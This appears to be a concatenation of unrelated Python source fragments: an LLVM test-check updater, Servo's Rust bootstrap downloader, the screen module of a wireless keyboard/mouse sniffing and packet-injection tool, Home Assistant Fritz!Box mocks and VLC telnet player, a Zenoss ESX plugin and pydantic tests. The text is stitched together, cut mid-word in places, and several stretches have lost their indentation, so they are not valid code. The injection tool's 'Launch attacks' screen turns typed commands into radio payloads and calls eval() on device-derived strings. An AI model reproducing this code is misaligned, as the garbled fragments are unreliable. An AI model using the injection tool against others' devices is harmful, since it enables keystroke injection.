      check_prefixes = [item for m in common.CHECK_PREFIX_RE.finditer(filecheck_cmd)
                        for item in m.group(1).split(',')]
      if not check_prefixes:
        check_prefixes = ['CHECK']
      # FIXME: We should use multiple check prefixes to common check lines. For
      # now, we just ignore all but the last.
      prefix_list.append((check_prefixes, tool_cmd_args))
    func_dict = {}
    for prefixes, _ in prefix_list:
      for prefix in prefixes:
        func_dict.update({prefix: dict()})
    for prefixes, opt_args in prefix_list:
      common.debug('Extracted opt cmd:', opt_basename, opt_args, file=sys.stderr)
      common.debug('Extracted FileCheck prefixes:', str(prefixes), file=sys.stderr)
      raw_tool_outputs = common.invoke_tool(args.opt_binary, opt_args, test)
      # Split analysis outputs by "Printing analysis " declarations.
      for raw_tool_output in re.split(r'Printing analysis ', raw_tool_outputs):
        common.build_function_body_dictionary(
            common.ANALYZE_FUNCTION_RE, common.scrub_body, [],
            raw_tool_output, prefixes, func_dict, args.verbose, False, False)
    is_in_function = False
    is_in_function_start = False
    prefix_set = set([prefix for prefixes, _ in prefix_list for prefix in prefixes])
    common.debug('Rewriting FileCheck prefixes:', str(prefix_set), file=sys.stderr)
    output_lines = []
    output_lines.append(autogenerated_note)
    for input_line in input_lines:
      if is_in_function_start:
        if input_line == '':
          continue
        if input_line.lstrip().startswith(';'):
          m = common.CHECK_RE.match(input_line)
          if not m or m.group(1) not in prefix_set:
            output_lines.append(input_line)
            continue
        # Print out the various check lines here.
        common.add_analyze_checks(output_lines, ';', prefix_list, func_dict, func_name)
        is_in_function_start = False
      if is_in_function:
        if common.should_add_line_to_output(input_line, prefix_set):
          # This input line of the function body will go as-is into the output.
          # Except make leading whitespace uniform: 2 spaces.
          input_line = common.SCRUB_LEADING_WHITESPACE_RE.sub(r'  ', input_line)
          output_lines.append(input_line)
        else:
          continue
        if input_line.strip() == '}':
          is_in_function = False
        continue
      # Discard any previous script advertising.
      if input_line.startswith(ADVERT):
        continue
      # If it's outside a function, it just gets copied to the output.
      output_lines.append(input_line)
      m = common.IR_FUNCTION_RE.match(input_line)
      if not m:
        continue
      func_name = m.group(1)
      if args.function is not None and func_name != args.function:
        # When filtering on a specific function, skip all others.
        continue
      is_in_function = is_in_function_start = True
    common.debug('Writing %d lines to %s...' % (len(output_lines), test))
    with open(test, 'wb') as f:
      f.writelines(['{}\n'.format(l).encode('utf-8') for l in output_lines])
# Allow the file to be used both as a script and as an importable module.
if __name__ == '__main__':
  main()
|
size is not None:
pct = recved * 100.0 / fsize
print("\rDownloading %s: %5.1f%%" % (desc, pct), end="")
sys.stdout.flush()
writer.write(chunk)
if not dumb:
print()
except urllib2.HTTPError, e:
print("Download failed (%d): %s - %s" % (e.code, e.reason, src))
sys.exit(1)
def download_file(desc, src, dst):
    """Download URL *src* to the path *dst*; *desc* labels progress output."""
    with open(dst, 'wb') as fd:
        download(desc, src, fd)
def download_bytes(desc, src):
    """Download URL *src* and return its content as a string (Python 2 StringIO)."""
    content_writer = StringIO.StringIO()
    download(desc, src, content_writer)
    return content_writer.getvalue()
def extract(src, dst, movedir=None):
    """Unpack tarball *src* into *dst*, then delete the tarball.

    If *movedir* is given, every entry inside that directory is moved up
    into *dst* and the (then empty) directory is removed.
    """
    # Close the archive explicitly: the original left the handle open, which
    # can make the os.remove() below fail on platforms with mandatory file
    # locking (e.g. Windows).
    with tarfile.open(src) as tar:
        tar.extractall(dst)
    if movedir:
        for entry in os.listdir(movedir):
            os.rename(path.join(movedir, entry), path.join(dst, entry))
        os.rmdir(movedir)
    os.remove(src)
@CommandProvider
class MachCommands(CommandBase):
    @Command('env',
             description='Print environment setup commands',
             category='bootstrap')
    def env(self):
        """Print shell export lines for PATH and the dynamic-linker path."""
        env = self.build_env()
        print("export PATH=%s" % env["PATH"])
        # macOS and Linux use different dynamic-linker search variables.
        if sys.platform == "darwin":
            print("export DYLD_LIBRARY_PATH=%s" % env["DYLD_LIBRARY_PATH"])
        else:
            print("export LD_LIBRARY_PATH=%s" % env["LD_LIBRARY_PATH"])
    @Command('bootstrap-rust',
             description='Download the Rust compiler',
             category='bootstrap')
    @CommandArgument('--force', '-f',
                     action='store_true',
                     help='Force download even if a copy already exists')
    def bootstrap_rustc(self, force=False):
        """Download the nightly rustc plus the stdlib for each needed target."""
        rust_dir = path.join(
            self.context.sharedir, "rust", self.rust_path())
        if not force and path.exists(path.join(rust_dir, "rustc", "bin", "rustc" + BIN_SUFFIX)):
            print("Rust compiler already downloaded.", end=" ")
            print("Use |bootstrap-rust --force| to download again.")
            return
        if path.isdir(rust_dir):
            shutil.rmtree(rust_dir)
        os.makedirs(rust_dir)
        # assumes rust_path() looks like "<date>/rustc-nightly-..." — TODO confirm
        date = self.rust_path().split("/")[0]
        install_dir = path.join(self.context.sharedir, "rust", date)
        # The Rust compiler is hosted on the nightly server under the date with a name
        # rustc-nightly-HOST-TRIPLE.tar.gz. We just need to pull down and extract it,
        # giving a directory name that will be the same as the tarball name (rustc is
        # in that directory).
        rustc_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s.tar.gz"
                     % self.rust_path())
        tgz_file = rust_dir + '-rustc.tar.gz'
        download_file("Rust compiler", rustc_url, tgz_file)
        print("Extracting Rust compiler...")
        extract(tgz_file, install_dir)
        # Each Rust stdlib has a name of the form `rust-std-nightly-TRIPLE.tar.gz`, with
        # a directory of the name `rust-std-TRIPLE` inside and then a `lib` directory.
        # This `lib` directory needs to be extracted and merged with the `rustc/lib`
        # directory from the host compiler above.
        # TODO: make it possible to request an additional cross-target to add to this
        # list.
        stdlibs = [host_triple(), "arm-linux-androideabi"]
        for target in stdlibs:
            std_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s/rust-std-nightly-%s.tar.gz"
                       % (date, target))
            # NOTE(review): plain string concatenation (no path separator) —
            # the tarball lands *next to* install_dir; verify this is intended.
            tgz_file = install_dir + ('rust-std-nightly-%s.tar.gz' % target)
            download_file("Host rust library for target %s" % target, std_url, tgz_file)
            print("Extracting Rust stdlib for target %s..." % target)
            extract(tgz_file, install_dir)
            shutil.copytree(path.join(install_dir, "rust-std-nightly-%s" % target,
                                      "rust-std-%s" % target, "lib", "rustlib", target),
                            path.join(install_dir, "rustc-nightly-%s" % host_triple(),
                                      "rustc", "lib", "rustlib", target))
            shutil.rmtree(path.join(install_dir, "rust-std-nightly-%s" % target))
        print("Rust ready.")
    @Command('bootstrap-rust-docs',
             description='Download the Rust documentation',
             category='bootstrap')
    @CommandArgument('--force', '-f',
                     action='store_true',
                     help='Force download even if docs already exist')
    def bootstrap_rustc_docs(self, force=False):
        """Download and unpack the nightly Rust docs into <rust-root>/doc."""
        self.ensure_bootstrapped()
        rust_root = self.config["tools"]["rust-root"]
        docs_dir = path.join(rust_root, "doc")
        if not force and path.exists(docs_dir):
            print("Rust docs already downloaded.", end=" ")
            print("Use |bootstrap-rust-docs --force| to download again.")
            return
        if path.isdir(docs_dir):
            shutil.rmtree(docs_dir)
        docs_name = self.rust_path().replace("rustc-", "rust-docs-")
        # NOTE(review): the URL is built from host_triple() while docs_name is
        # derived from rust_path(); confirm the two stay consistent.
        docs_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/rust-docs-nightly-%s.tar.gz"
                    % host_triple())
        tgz_file = path.join(rust_root, 'doc.tar.gz')
        download_file("Rust docs", docs_url, tgz_file)
        print("Extracting Rust docs...")
        temp_dir = path.join(rust_root, "temp_docs")
        if path.isdir(temp_dir):
            shutil.rmtree(temp_dir)
        extract(tgz_file, temp_dir)
        # Keep only the rendered HTML; discard the rest of the tarball.
        shutil.move(path.join(temp_dir, docs_name.split("/")[1],
                              "rust-docs", "share", "doc", "rust", "html"),
                    docs_dir)
        shutil.rmtree(temp_dir)
        print("Rust docs ready.")
    @Command('bootstrap-cargo',
             description='Download the Cargo build tool',
             category='bootstrap')
    @CommandArgument('--force', '-f',
                     action='store_true',
                     help='Force download even if cargo already exists')
    def bootstrap_cargo(self, force=False):
        """Download and unpack a nightly Cargo into the shared tools directory."""
        cargo_dir = path.join(self.context.sharedir, "cargo",
                              self.cargo_build_id())
        if not force and path.exists(path.join(cargo_dir, "cargo", "bin", "cargo" + BIN_SUFFIX)):
            print("Cargo already downloaded.", end=" ")
            print("Use |bootstrap-cargo --force| to download again.")
            return
        if path.isdir(cargo_dir):
            shutil.rmtree(cargo_dir)
        os.makedirs(cargo_dir)
        # NOTE(review): tgz_file is a bare filename, so the download lands in
        # the current working directory — verify that is intended.
        tgz_file = "cargo-nightly-%s.tar.gz" % host_triple()
        nightly_url = "https://static-rust-lang-org.s3.amazonaws.com/cargo-dist/%s/%s" % \
            (self.cargo_build_id(), tgz_file)
        download_file("Cargo nightly", nightly_url, tgz_file)
        print("Extracting Cargo nightly...")
        # extract() flattens the dated directory's contents into cargo_dir.
        nightly_dir = path.join(cargo_dir,
                                path.basename(tgz_file).replace(".tar.gz", ""))
        extract(tgz_file, cargo_dir, movedir=nightly_dir)
        print("Cargo ready.")
@Command('update-hsts-preload',
description='Download the HSTS preload list',
category='bootstrap')
def bootstrap_hsts_preload(self, force=False):
preload_filename = "hsts_preload.json"
preload_path = path.join(self.context.topdir, "resources")
chromium_hsts_url = "https://chromium.googlesource.com/chromium/src" + \
"/net/+/master/http/transport_security_state_static.json?format=TEXT"
try:
content_base64 = download_bytes("Chromium HSTS preload list", chromium_hsts_url)
except urllib2.URLError:
print("Unable to download chromium HSTS preload list; are you connected to the internet?")
sys.exit(1)
content_decoded = base64.b64decode(content_base64)
# The chromium "json" has single line comments in it which, of course,
# are non-standard/non-valid json. Simply strip them out before parsing
content_json = re.sub(r'(^|\s+)//.*$', '', content_decoded, flags=re.MULTILINE)
try:
pins_and_static_preloads = json.loads(content_json)
entries = {
|
between different classes and scripts.
'''
import sys
sys.path.append("..")
from array import array
from utils import display
from utils.device import *
from lib import common
# Shared mutable state for the scanner UI, updated by the functions below.
# Last command string entered by the user.
command = ''
# All devices discovered so far (utils.device objects).
devices = []
# Index into `devices` of the currently selected device.
deviceID = None
# Valid menu selections for the current screen.
menu = []
# Extra seconds to linger on a channel while verifying a device — set elsewhere.
channel_time = None
# Matching strictness flag — set elsewhere; semantics not visible here.
strict_match = None
# Add a new device to the devices
def add_device(address, channel, payload):
    """Register a newly scanned device, or merge fresh scan data into a
    known one, then refresh the scanner screen.

    Unidentified devices trigger a re-scan of the channel so they get a
    chance to be verified.
    """
    from player import Player
    def redo_scan(channel):
        # Keep the Player listening on this channel a little longer so an
        # unidentified device can be verified.
        if Player.feature_ping < Player.last_ping:
            global channel_time
            # Pause Player correctly
            while not Player._pause:
                Player._flag.clear()
            # Set channel
            Player.channel = channel
            common.radio.set_channel(channel)
            # Set feature_ping to keep receiving payloads on this channel for few seconds
            Player.feature_ping = Player.last_ping + common.timeout + channel_time
            # Resume Player
            Player._flag.set()
    global devices
    # Search in devices list
    for i in range(len(devices)):
        if address == devices[i].address:
            # Update device's channels
            if channel not in devices[i].channels:
                devices[i].channels.append(channel)
                devices[i].channels.sort()
            # Update the device's payloads if it satisfies the following requirements
            # (PEP 8: compare to None with `is`, not `==`)
            if devices[i].model is None and len(payload) > 0 and payload not in devices[i].payloads:
                devices[i].payloads.append(payload)
            # Update device
            devices[i] = match_device(address, devices[i].channels, devices[i].payloads)
            # Keep scanning on this channel to verify the device if the device was not recognized
            if devices[i].model is None:
                redo_scan(channel)
            else:
                Player.feature_ping = Player.last_ping
            break
    # Add a new device to the devices
    else:
        payloads = []
        if len(payload) > 0: payloads.append(payload)
        devices.append(match_device(address, [channel], payloads))
        # Found new device, keep scanning on this channel to verify the device
        redo_scan(channel)
    # Display the scan result
    update_scanner_msg()
def update_scanner_msg():
    """Render the table of scanned devices and refresh the display."""
    global devices, menu
    # The menu indices track the devices list one-to-one.
    menu = range(len(devices))
    row_fmt = '{0:<4}{1:<16}{2:<24}{3:<14}{4:<8}{5:<14}'
    msg = ['----------------------------------SCAN DEVICES----------------------------------',
           row_fmt.format('No.', 'Address', 'Channels', 'Vendor', 'Model', 'Status')]
    for idx, dev in enumerate(devices):
        msg.append(row_fmt.format(
            idx + 1,
            ':'.join('{:02X}'.format(b) for b in dev.address),
            ','.join(str(c) for c in dev.channels),
            dev.vendor,
            dev.model,
            dev.status))
    display.refresh(msg)
def update_device(address, channel, payload):
    """Merge a freshly sniffed (channel, payload) pair into the currently
    selected device, re-match it, and switch screens once identified.
    """
    global devices, deviceID
    # Search in devices list
    device = devices[deviceID]
    # Update device's channels
    if channel not in device.channels:
        device.channels.append(channel)
        device.channels.sort()
    # Update device's payloads if it satisfies the following requirements
    if len(payload) > 0 and payload not in device.payloads:
        device.payloads.append(payload)
    # Update device
    device = match_device(device.address, device.channels, device.payloads)
    # Renew device
    devices[deviceID] = device
    # PEP 8: compare to None with `is not`, not `!=`.
    if device.model is not None:
        # Pause player
        from player import Player
        Player._flag.set()
        # # Update channels
        # update_channels()
        update_tasks_msg()
    else:
        update_matcher_msg()
def update_tasks_msg():
    """Render the task-selection screen for the selected device."""
    global devices, deviceID, menu
    device = devices[deviceID]
    addr = ':'.join('{:02X}'.format(b) for b in device.address)
    msg = ['----------------------------------SELECT TASKS----------------------------------',
           'You selected: {0} ({1} {2})'.format(addr, device.vendor, device.model)]
    # Two selectable tasks: sniff or attack.
    menu = range(2)
    msg.append('{0:<6}{1}'.format('No.', 'Task'))
    msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
    msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
    display.refresh(msg)
def update_matcher_msg():
    """Show a holding screen while the selected device is being located,
    including (test code) the last payloads received from it.
    """
    global devices, deviceID, menu
    device = devices[deviceID]
    msg = []
    msg.append('----------------------------------SELECT TASKS----------------------------------')
    msg.append('You selected: {0} ({1} {2})'.format(
        ':'.join('{:02X}'.format(b) for b in device.address),
        device.vendor, device.model))
    # No selectable entries until the device has been identified.
    menu = []
    # msg.append('{0:<6}{1}'.format('No.', 'Task'))
    # msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
    # msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
    msg.append('')
    # Fixed user-facing typos: "avaliable" -> "available", "minites" -> "minutes".
    msg.append('* Tasks are not available right now because the device has not been located yet.')
    msg.append('* It may take minutes to locate the device, please wait...')
    msg.append('')
    #### Test Code For Monitoring payloads
    payload_count = len(device.payloads)
    # Show at most the last 10 payloads.
    start = max(payload_count - 10, 0)
    for i in range(start, payload_count):
        msg.append('{0:<10}{1}'.format(
            i+1,
            ':'.join('{:02X}'.format(b) for b in device.payloads[i])))
    ####
    # Refresh display
    display.refresh(msg)
def update_sniffer_msg():
    """Render the packet-sniffing screen, decoding the oldest recorded
    payload with the selected device's decoder module.
    """
    global menu, devices, deviceID
    device = devices[deviceID]
    # No selectable entries on this screen.
    menu = []
    msg = []
    msg.append('----------------------------------SNIFF PACKETS---------------------------------')
    msg.append('{0:<10}{1} {2}'.format('Device: ', device.vendor, device.model))
    msg.append('{0:<10}{1}'.format('Address: ', ':'.join('{:02X}'.format(b) for b in device.address)))
    msg.append('{0:<10}{1}'.format('Channels: ', ', '.join(str(c) for c in device.channels)))
    payload = array('B', [])
    # channel = None
    from player import Player
    # Consume the oldest recorded payload, if any.
    if len(Player.records) > 0:
        # channel = Player.records[0][0]
        payload = Player.records[0][1]
        del Player.records[0]
    # msg.append('{0:<10}{1}'.format('Channel: ', channel))
    msg.append('')
    # Acquire the decoder path
    decoder ='{0}.decode'.format(devices[deviceID].moduler)
    try:
        # Decode the payload
        # NOTE(review): eval() on a string built from device data — fine if
        # `moduler` only ever comes from trusted local modules; consider
        # importlib/getattr instead.
        for m in eval(decoder)(payload):
            msg.append(m)
    except Exception as e:
        # Decoder errors are shown on screen instead of crashing the UI.
        msg.append(str(e))
    # Refresh display
    display.refresh(msg)
# The following method also has to be optimised
def update_attacker_msg(ping_rate=0):
    """Render the attack-status screen plus the last 10 attack records."""
    global menu, devices, deviceID
    device = devices[deviceID]
    menu = []
    msg = []
    msg.append('----------------------------------LAUNCH ATTACK---------------------------------')
    msg.append('{0:<9}{1} {2} {3}'.format('Device', ':', device.vendor, device.model))
    msg.append('{0:<9}{1} {2}'.format('Address', ':', ':'.join('{:02X}'.format(b) for b in device.address)))
    msg.append('{0:<9}{1} {2}'.format('Channels', ':', ', '.join(str(c) for c in device.channels)))
    from player import Player
    # Conditional expression instead of the fragile `and/or` idiom.
    status = 'Attacking...' if len(Player.payloads) > 0 else 'No attack request found.'
    msg.append('{0:<9}{1} {2}'.format('Status', ':', status))
    # Refresh ping rate
    msg.append('{0:<9}{1} {2:<4}{3}'.format('Ping rate', ':', int(ping_rate), 'pks/s'))
    msg.append('')
    msg.append('----------------------------------ATTACK HISTORY--------------------------------')
    msg.append('{0:<5}{1:<4}{2}'.format('No.', 'Ch.', 'Payload'))
    total = len(Player.records)
    # Show at most the last 10 records (max() replaces the `and/or` hack).
    start = max(total - 10, 0)
    for i in range(start, total):
        msg.append('{0:<5}{1:<4}{2}'.format(i+1, Player.records[i][0], Player.records[i][1]))
    # Refresh display
    display.refresh(msg)
# Parse attack commands
def parse_attack_commands(cmds):
# Parse commands
global devices, deviceID
def split_command(cs):
cmds = []
i = 0
while i < len(cs):
if cs[i] == '<':
new_cs = ''
while i+1 < len(cs) and cs[i+1] != '>':
i += 1
new_cs += cs[i]
cmds.append(new_cs)
i += 1
else:
cmds.append(cs[i])
i +=1
return cmds
# Convert command list into payload list
# and append them into Player.payloads
device = devices[deviceID]
payloads = []
# from utils.devices import amazonbasics, logitech_mouse
encoder ='{0}.encode'.format(device.moduler)
for cmd in split_command(cmds):
# self.add_record(['CMD', cmd])
for payload in eval(encoder)(cmd, device):
payloads.append(payload)
retu |
"""Tests for the AVM Fritz!Box integration."""
from __future__ import annotations
from typing import Any
from unittest.mock import Mock
from homeassistant.components.fritzbox.const import DOMAIN
from homeassistant.core import HomeAssistant
from .const import (
CONF_FAKE_AIN,
CONF_FAKE_MANUFACTURER,
CONF_FAKE_NAME,
CONF_FAKE_PRODUCTNAME,
)
from tests.common import MockConfigEntry
async def setup_config_entry(
    hass: HomeAssistant,
    data: dict[str, Any],
    unique_id: str = "any",
    device: Mock = None,
    fritz: Mock = None,
) -> bool:
    """Create a MockConfigEntry, register it on hass, and set it up.

    When both a device mock and a fritz mock are supplied, the fritz
    connection is primed to report that single device.
    """
    entry = MockConfigEntry(domain=DOMAIN, data=data, unique_id=unique_id)
    entry.add_to_hass(hass)
    have_device = device is not None
    if have_device and fritz is not None:
        fritz().get_devices.return_value = [device]
    result = await hass.config_entries.async_setup(entry.entry_id)
    if have_device:
        # Let the entity platforms finish setting up before returning.
        await hass.async_block_till_done()
    return result
class FritzDeviceBaseMock(Mock):
    """Base mock of an AVM Fritz!Box device, shared by all device mocks."""
    # Fixed fake identity attributes, taken from the test constants module.
    ain = CONF_FAKE_AIN
    manufacturer = CONF_FAKE_MANUFACTURER
    name = CONF_FAKE_NAME
    productname = CONF_FAKE_PRODUCTNAME
class FritzDeviceBinarySensorMock(FritzDeviceBaseMock):
    """Mock of a AVM Fritz!Box binary sensor device."""
    alert_state = "fake_state"
    battery_level = 23
    fw_version = "1.2.3"
    # Only the alarm capability is enabled for this mock.
    has_alarm = True
    has_powermeter = False
    has_switch = False
    has_temperature_sensor = False
    has_thermostat = False
    present = True
class FritzDeviceClimateMock(FritzDeviceBaseMock):
    """Mock of a AVM Fritz!Box climate device."""
    actual_temperature = 18.0
    alert_state = "fake_state"
    battery_level = 23
    battery_low = True
    comfort_temperature = 22.0
    device_lock = "fake_locked_device"
    eco_temperature = 16.0
    fw_version = "1.2.3"
    # Thermostat is the only capability enabled for this mock.
    has_alarm = False
    has_powermeter = False
    has_switch = False
    has_temperature_sensor = False
    has_thermostat = True
    holiday_active = "fake_holiday"
    lock = "fake_locked"
    present = True
    summer_active = "fake_summer"
    target_temperature = 19.5
    window_open = "fake_window"
class FritzDeviceSensorMock(FritzDeviceBaseMock):
    """Mock of a AVM Fritz!Box sensor device."""
    battery_level = 23
    device_lock = "fake_locked_device"
    fw_version = "1.2.3"
    # Temperature sensing is the only capability enabled for this mock.
    has_alarm = False
    has_powermeter = False
    has_switch = False
    has_temperature_sensor = True
    has_thermostat = False
    lock = "fake_locked"
    present = True
    temperature = 1.23
    rel_humidity = 42
class FritzDeviceSwitchMock(FritzDeviceBaseMock):
    """Mock of a AVM Fritz!Box switch device."""
    # None: a mains-powered switch reports no battery level.
    battery_level = None
    device_lock = "fake_locked_device"
    energy = 1234
    voltage = 230
    fw_version = "1.2.3"
    has_alarm = False
    # Switch and power metering plus a temperature sensor are enabled.
    has_powermeter = True
    has_switch = True
    has_temperature_sensor = True
    has_thermostat = False
    switch_state = "fake_state"
    lock = "fake_locked"
    power = 5678
    present = True
    temperature = 1.23
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2009, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
__doc__="""Esx
Plugin to gather information about virtual machines running
under a VMWare ESX server v3.0
"""
import Globals
from Products.DataCollector.plugins.CollectorPlugin \
import SnmpPlugin, GetTableMap
from Products.DataCollector.plugins.DataMaps \
import ObjectMap
class Esx(SnmpPlugin):
    """SNMP modeler plugin: maps guest VMs reported by a VMware ESX v3
    host into VirtualMachine objects on the guestDevices relation."""
    # compname = "os"
    relname = "guestDevices"
    modname = 'ZenPacks.zenoss.ZenossVirtualHostMonitor.VirtualMachine'
    # OID column suffix -> attribute name within the VMware vminfo table.
    columns = {
        '.1': 'snmpindex',
        '.2': 'displayName',
        '.4': 'osType',
        '.5': 'memory',
        '.6': 'adminStatus',
        '.7': 'vmid',
        '.8': 'operStatus',
        }
    snmpGetTableMaps = (
        # VMware ESX vminfo table (enterprise OID 6876).
        GetTableMap('vminfo', '.1.3.6.1.4.1.6876.2.1.1', columns),
    )
    def process(self, device, results, log):
        """Build a relationship map of VM object maps from the SNMP table."""
        log.info('processing %s for device %s', self.name(), device.id)
        getdata, tabledata = results
        table = tabledata.get("vminfo")
        rm = self.relMap()
        for info in table.values():
            # Normalize the string statuses to booleans.
            info['adminStatus'] = info['adminStatus'] == 'poweredOn'
            info['operStatus'] = info['operStatus'] == 'running'
            # The VM id becomes the SNMP index used for later polling.
            info['snmpindex'] = info['vmid']
            del info['vmid']
            om = self.objectMap(info)
            om.id = self.prepId(om.displayName)
            rm.append(om)
        return [rm]
|
"""Provide functionality to interact with the vlc telnet interface."""
import logging
from python_telnet_vlc import ConnectionError as ConnErr, VLCTelnet
import voluptuous as vol
from homeassistant.components.media_player import PLATFORM_SCHEMA, MediaPlayerDevice
from homeassistant.components.media_player.const import (
MEDIA_TYPE_MUSIC,
SUPPORT_CLEAR_PLAYLIST,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SEEK,
SUPPORT_SHUFFLE_SET,
SUPPORT_STOP,
SUPPORT_VOLUME_MUTE,
SUPPORT_VOLUME_SET,
)
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
STATE_IDLE,
STATE_PAUSED,
STATE_PLAYING,
STATE_UNAVAILABLE,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DOMAIN = "vlc_telnet"
DEFAULT_NAME = "VLC-TELNET"
DEFAULT_PORT = 4212
SUPPORT_VLC = (
SUPPORT_PAUSE
| SUPPORT_SEEK
| SUPPORT_VOLUME_SET
| SUPPORT_VOLUME_MUTE
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_CLEAR_PLAYLIST
| SUPPORT_PLAY
| SUPPORT_SHUFFLE_SET
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the vlc platform."""
    # Pull the connection settings out of the validated YAML config and
    # register a single player entity (update_before_add=True).
    name = config.get(CONF_NAME)
    host = config.get(CONF_HOST)
    port = config.get(CONF_PORT)
    password = config.get(CONF_PASSWORD)
    add_entities([VlcDevice(name, host, port, password)], True)
class VlcDevice(MediaPlayerDevice):
    """Representation of a vlc player.

    Talks to a VLC instance over its telnet interface. The connection is
    established lazily in update() and dropped again (self._vlc = None)
    on any telnet error, so the next update cycle reconnects.
    """
    def __init__(self, name, host, port, passwd):
        """Initialize the vlc device."""
        self._instance = None
        self._name = name
        self._volume = None
        self._muted = None
        self._state = STATE_UNAVAILABLE
        self._media_position_updated_at = None
        self._media_position = None
        self._media_duration = None
        self._host = host
        self._port = port
        self._password = passwd
        # Telnet client handle; None while disconnected.
        self._vlc = None
        self._available = False
        # Volume level remembered before muting, restored on unmute.
        self._volume_bkp = 0
        self._media_artist = ""
        self._media_title = ""
    def update(self):
        """Get the latest details from the device."""
        if self._vlc is None:
            # Not connected (or the previous connection died): reconnect.
            try:
                self._vlc = VLCTelnet(self._host, self._password, self._port)
                self._state = STATE_IDLE
                self._available = True
            except (ConnErr, EOFError):
                self._available = False
                self._vlc = None
        else:
            try:
                status = self._vlc.status()
                if status:
                    # VLC reports volume on a 0..500 scale; normalize to 0..1.
                    if "volume" in status:
                        self._volume = int(status["volume"]) / 500.0
                    else:
                        self._volume = None
                    if "state" in status:
                        state = status["state"]
                        if state == "playing":
                            self._state = STATE_PLAYING
                        elif state == "paused":
                            self._state = STATE_PAUSED
                        else:
                            self._state = STATE_IDLE
                    else:
                        self._state = STATE_IDLE
                self._media_duration = self._vlc.get_length()
                self._media_position = self._vlc.get_time()
                info = self._vlc.info()
                if info:
                    self._media_artist = info[0].get("artist")
                    self._media_title = info[0].get("title")
            except (ConnErr, EOFError):
                # Connection dropped; force a reconnect next cycle.
                self._available = False
                self._vlc = None
        return True
    @property
    def name(self):
        """Return the name of the device."""
        return self._name
    @property
    def state(self):
        """Return the state of the device."""
        return self._state
    @property
    def available(self) -> bool:
        """Return True if entity is available."""
        return self._available
    @property
    def volume_level(self):
        """Volume level of the media player (0..1)."""
        return self._volume
    @property
    def is_volume_muted(self):
        """Boolean if volume is currently muted."""
        return self._muted
    @property
    def supported_features(self):
        """Flag media player features that are supported."""
        return SUPPORT_VLC
    @property
    def media_content_type(self):
        """Content type of current playing media."""
        return MEDIA_TYPE_MUSIC
    @property
    def media_duration(self):
        """Duration of current playing media in seconds."""
        return self._media_duration
    @property
    def media_position(self):
        """Position of current playing media in seconds."""
        return self._media_position
    @property
    def media_position_updated_at(self):
        """When was the position of the current playing media valid."""
        return self._media_position_updated_at
    @property
    def media_title(self):
        """Title of current playing media."""
        return self._media_title
    @property
    def media_artist(self):
        """Artist of current playing media, music track only."""
        return self._media_artist
    def media_seek(self, position):
        """Seek the media to a specific location."""
        # NOTE(review): assumes get_length() returns milliseconds and
        # seek() takes a fraction of the track — confirm in python_telnet_vlc.
        track_length = self._vlc.get_length() / 1000
        self._vlc.seek(position / track_length)
    def mute_volume(self, mute):
        """Mute the volume."""
        if mute:
            # Remember the current level so unmute can restore it.
            self._volume_bkp = self._volume
            self._volume = 0
            self._vlc.set_volume("0")
        else:
            self._vlc.set_volume(str(self._volume_bkp))
            self._volume = self._volume_bkp
        self._muted = mute
    def set_volume_level(self, volume):
        """Set volume level, range 0..1."""
        # Scale back to VLC's 0..500 range (inverse of update()).
        self._vlc.set_volume(str(volume * 500))
        self._volume = volume
    def media_play(self):
        """Send play command."""
        self._vlc.play()
        self._state = STATE_PLAYING
    def media_pause(self):
        """Send pause command."""
        self._vlc.pause()
        self._state = STATE_PAUSED
    def media_stop(self):
        """Send stop command."""
        self._vlc.stop()
        self._state = STATE_IDLE
    def play_media(self, media_type, media_id, **kwargs):
        """Play media from a URL or file."""
        if media_type != MEDIA_TYPE_MUSIC:
            _LOGGER.error(
                "Invalid media type %s. Only %s is supported",
                media_type,
                MEDIA_TYPE_MUSIC,
            )
            return
        # 'add' enqueues and starts playback of the given MRL.
        self._vlc.add(media_id)
        self._state = STATE_PLAYING
    def media_previous_track(self):
        """Send previous track command."""
        self._vlc.prev()
    def media_next_track(self):
        """Send next track command."""
        self._vlc.next()
    def clear_playlist(self):
        """Clear players playlist."""
        self._vlc.clear()
    def set_shuffle(self, shuffle):
        """Enable/disable shuffle mode."""
        self._vlc.random(shuffle)
| |
import pytest
from pydantic import BaseModel, Extra, Field, ValidationError, create_model, errors, validator
def test_create_model():
    # A dynamically created class should look exactly like a hand-written
    # pydantic model: name, fields, (empty) validators, config, module.
    model = create_model('FooModel', foo=(str, ...), bar=123)
    assert issubclass(model, BaseModel)
    assert issubclass(model.__config__, BaseModel.Config)
    assert model.__name__ == 'FooModel'
    assert model.__fields__.keys() == {'foo', 'bar'}
    assert model.__validators__ == {}
    assert model.__config__.__name__ == 'Config'
    assert model.__module__ == 'pydantic.main'
def test_create_model_usage():
    # foo is required (ellipsis default); bar defaults to 123 (type inferred).
    model = create_model('FooModel', foo=(str, ...), bar=123)
    m = model(foo='hello')
    assert m.foo == 'hello'
    assert m.bar == 123
    with pytest.raises(ValidationError):
        model()
    with pytest.raises(ValidationError):
        model(foo='hello', bar='xxx')
def test_create_model_pickle(create_module):
    """
    Pickle will work for dynamically created model only if it was defined globally with its class name
    and module where it's defined was specified
